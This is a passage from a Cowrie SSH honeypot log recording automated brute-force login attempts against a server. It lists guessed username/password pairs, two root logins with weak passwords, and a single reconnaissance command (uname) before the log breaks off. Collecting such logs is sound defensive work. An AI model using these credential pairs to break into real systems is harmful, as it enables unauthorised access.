0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:49.756278Z","src_ip":"45.125.211.194","session":"fa1e37eb062d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:50.593781Z","src_ip":"45.125.211.194","session":"fa1e37eb062d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:51.805340Z","src_ip":"45.125.211.194","session":"fa1e37eb062d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39098,"dst_ip":"1.2.3.4","dst_port":22,"session":"823be3347fc0","protocol":"ssh","message":"New connection: 212.227.125.160:39098 (1.2.3.4:22) [session: 823be3347fc0]","sensor":"my-vps","timestamp":"2025-08-28T03:33:55.465027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:55.466000Z","src_ip":"212.227.125.160","session":"823be3347fc0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:55.688767Z","src_ip":"212.227.125.160","session":"823be3347fc0"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:56.361237Z","src_ip":"212.227.125.160","session":"823be3347fc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46128,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6270647c32b","protocol":"ssh","message":"New connection: 212.227.235.229:46128 (1.2.3.4:22) [session: a6270647c32b]","sensor":"my-vps","timestamp":"2025-08-28T03:33:56.611146Z"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":44174,"dst_ip":"1.2.3.4","dst_port":22,"session":"59fc522b5556","protocol":"ssh","message":"New connection: 194.233.79.134:44174 (1.2.3.4:22) [session: 59fc522b5556]","sensor":"my-vps","timestamp":"2025-08-28T03:33:56.665526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:56.667639Z","src_ip":"194.233.79.134","session":"59fc522b5556"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:33:56.787835Z","src_ip":"212.227.235.229","session":"a6270647c32b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:33:57.003639Z","src_ip":"212.227.235.229","session":"a6270647c32b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:57.586057Z","src_ip":"212.227.125.160","session":"823be3347fc0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:57.672879Z","src_ip":"194.233.79.134","session":"59fc522b5556"}
{"eventid":"cowrie.login.failed","username":"steve","password":"steve","message":"login attempt [steve/steve] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:57.942635Z","src_ip":"212.227.235.229","session":"a6270647c32b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65520,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2340d1cb845","protocol":"ssh","message":"New connection: 212.227.235.229:65520 (1.2.3.4:22) [session: b2340d1cb845]","sensor":"my-vps","timestamp":"2025-08-28T03:33:58.125721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:33:58.126525Z","src_ip":"212.227.235.229","session":"b2340d1cb845"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:33:58.255473Z","src_ip":"212.227.235.229","session":"b2340d1cb845"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:58.416447Z","src_ip":"194.233.79.134","session":"59fc522b5556"}
{"eventid":"cowrie.login.failed","username":"moth3r","password":"fuck.3r","message":"login attempt [moth3r/fuck.3r] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:58.857048Z","src_ip":"212.227.235.229","session":"b2340d1cb845"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:59.053005Z","src_ip":"212.227.235.229","session":"a6270647c32b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:59.607890Z","src_ip":"194.233.79.134","session":"59fc522b5556"}
{"eventid":"cowrie.login.failed","username":"moth3r","password":"abc123","message":"login attempt [moth3r/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:59.988911Z","src_ip":"212.227.235.229","session":"b2340d1cb845"}
{"eventid":"cowrie.login.failed","username":"moth3r","password":"abcd123","message":"login attempt [moth3r/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:34:01.121007Z","src_ip":"212.227.235.229","session":"b2340d1cb845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49538,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0ce7b04c1b3","protocol":"ssh","message":"New connection: 212.227.125.160:49538 (1.2.3.4:22) [session: e0ce7b04c1b3]","sensor":"my-vps","timestamp":"2025-08-28T03:34:01.271634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:34:01.272704Z","src_ip":"212.227.125.160","session":"e0ce7b04c1b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:34:01.489276Z","src_ip":"212.227.125.160","session":"e0ce7b04c1b3"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:34:02.145000Z","src_ip":"212.227.125.160","session":"e0ce7b04c1b3"}
{"eventid":"cowrie.login.failed","username":"moth3r","password":"abcd1234","message":"login attempt [moth3r/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T03:34:02.251255Z","src_ip":"212.227.235.229","session":"b2340d1cb845"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:03.363611Z","src_ip":"212.227.125.160","session":"e0ce7b04c1b3"}
{"eventid":"cowrie.login.failed","username":"moth3r","password":"abc1234","message":"login attempt [moth3r/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T03:34:03.380818Z","src_ip":"212.227.235.229","session":"b2340d1cb845"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":8583,"dst_ip":"1.2.3.4","dst_port":22,"session":"17decb85dfe9","protocol":"ssh","message":"New connection: 45.125.211.194:8583 (1.2.3.4:22) [session: 17decb85dfe9]","sensor":"my-vps","timestamp":"2025-08-28T03:34:04.495080Z"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:04.511809Z","src_ip":"212.227.235.229","session":"b2340d1cb845"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:34:04.513587Z","src_ip":"45.125.211.194","session":"17decb85dfe9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:34:04.706119Z","src_ip":"45.125.211.194","session":"17decb85dfe9"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T03:34:05.545284Z","src_ip":"45.125.211.194","session":"17decb85dfe9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:06.757965Z","src_ip":"45.125.211.194","session":"17decb85dfe9"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":31277,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cbc5ac424a5","protocol":"ssh","message":"New connection: 45.125.211.194:31277 (1.2.3.4:22) [session: 9cbc5ac424a5]","sensor":"my-vps","timestamp":"2025-08-28T03:34:19.342118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:34:19.362533Z","src_ip":"45.125.211.194","session":"9cbc5ac424a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:34:19.551663Z","src_ip":"45.125.211.194","session":"9cbc5ac424a5"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:34:20.383190Z","src_ip":"45.125.211.194","session":"9cbc5ac424a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:34:20.817169Z","src_ip":"45.125.211.194","session":"9cbc5ac424a5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:34:20.817842Z","src_ip":"45.125.211.194","session":"9cbc5ac424a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:21.029973Z","src_ip":"45.125.211.194","session":"9cbc5ac424a5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:21.031224Z","src_ip":"45.125.211.194","session":"9cbc5ac424a5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64538,"dst_ip":"1.2.3.4","dst_port":22,"session":"b160232bb332","protocol":"ssh","message":"New connection: 217.72.205.35:64538 (1.2.3.4:22) [session: b160232bb332]","sensor":"my-vps","timestamp":"2025-08-28T03:34:21.657282Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:21.658595Z","src_ip":"217.72.205.35","session":"b160232bb332"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":48246,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f0c18eb9467","protocol":"ssh","message":"New connection: 45.125.211.194:48246 (1.2.3.4:22) [session: 9f0c18eb9467]","sensor":"my-vps","timestamp":"2025-08-28T03:34:34.096431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:34:34.098271Z","src_ip":"45.125.211.194","session":"9f0c18eb9467"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:34:34.308239Z","src_ip":"45.125.211.194","session":"9f0c18eb9467"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:34:35.145559Z","src_ip":"45.125.211.194","session":"9f0c18eb9467"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:34:35.658075Z","src_ip":"45.125.211.194","session":"9f0c18eb9467"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:34:35.658788Z","src_ip":"45.125.211.194","session":"9f0c18eb9467"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:35.897573Z","src_ip":"45.125.211.194","session":"9f0c18eb9467"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:34:35.898911Z","src_ip":"45.125.211.194","session":"9f0c18eb9467"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38362,"dst_ip":"1.2.3.4","dst_port":22,"session":"143efec1c2da","protocol":"ssh","message":"New connection: 212.227.235.229:38362 (1.2.3.4:22) [session: 143efec1c2da]","sensor":"my-vps","timestamp":"2025-08-28T03:34:39.141426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:34:39.142366Z","src_ip":"212.227.235.229","session":"143efec1c2da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-